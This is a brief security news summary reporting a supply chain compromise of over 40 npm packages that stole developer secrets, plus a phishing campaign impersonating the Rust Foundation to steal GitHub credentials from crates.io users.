Cybersecurity experts have uncovered a new attack on the npm registry involving trojanized packages that exfiltrate sensitive developer secrets. The attack also includes a phishing scam targeting crates.io users to steal GitHub credentials. #npmSupplyChain #RustFoundationPhishing
Keypoints
- A supply chain attack compromised over 40 npm packages by injecting malicious code.
- The injected script uses TruffleHog to scan for secrets and exfiltrate them via webhooks.
- The malicious packages include popular tools like angular, react, and nativeScript communities.
- A separate phishing campaign targets crates.io users with fake rustfoundation email alerts.
- The phishing links mimic GitHub login pages to steal credentials from unsuspecting developers.
Read More: https://thehackernews.com/2025/09/40-npm-packages-compromised-in-supply.html